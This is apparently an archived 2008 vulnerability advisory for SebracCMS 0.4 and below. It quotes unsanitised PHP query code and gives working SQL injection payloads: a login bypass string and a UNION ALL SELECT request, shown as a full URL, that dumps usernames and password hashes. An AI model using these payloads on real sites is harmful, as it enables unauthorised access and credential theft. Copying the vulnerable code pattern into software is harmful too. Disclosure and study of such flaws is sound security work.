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sebraccms-sql.txt

sebraccms-sql.txt
Posted Jun 29, 2008
Authored by shinmai

SebracCMS versions 0.4 and below suffer from multiple SQL injection vulnerabilities.

tags | exploit, vulnerability, sql injection
MD5 | 10f686df5300fbcfd99f9233d456f357

sebraccms-sql.txt

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# Name: SebracCMS
# Webiste: http://www.sebrac.netsons.org/cms/
# Vulnerability type: SQL Injection
# Author:
# shinmai, 2008-06-28
######################################################################################
# Description:
#
# SebracCMS contains two major SQL injection vulnerabilities:
# Unsanitazed POST-variables in SQL queries when logging users in. This allows
# login access without proper credentials.
# And unsanitized GET-variables in SQL queries when loading articles.
This allows
# an attacker to read all usernames and passwordhashes in the database.
#
# Vulnerable code in cms/index.php:

$n=$_POST['uname'];
$p= strtolower($_POST['upass']);
$cryp_p = md5($p);
//connect to db
include('incls/config.php');
$query="select * from sbc_user where uname='$n' and pw='$cryp_p'";

#
# POC
#
# using
admin' OR '1'='1
# as the username will allow login without proper registered credentials
#
#
# The second and far more serious SQL Injection is in cms/form/read.php
#
# This vulnerability allows an attacker to reveal all users and their
md5-password hashes.
#
#
# Vulnerable code in cms/form/read.php:

$rec=($_GET['recid']);
*SNIP*
$query="Select * from sbc_articles where idart= '$rec'" or die(mysql_error());

#
# POC
#
# using
1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
# as the GET-variable 'recid' reveals the first post along with all
registered users and their passwordhashes.
# Example:
http://localhost/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT
uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1

#
# There are some other SQLI-vulnerabilities there, but these two are
the most severe. I was going to include
# one more for changing any users password, but I simply didn't have
the time to start crafting very complex
# injections. Also, I have a sneaking suspicion there's a
LFI-vulnerability in the photo-gallery code in the CMS,
# but if there is one, I'll write up an other advisory on that.
#
# As always, Good luck and be safe.
#


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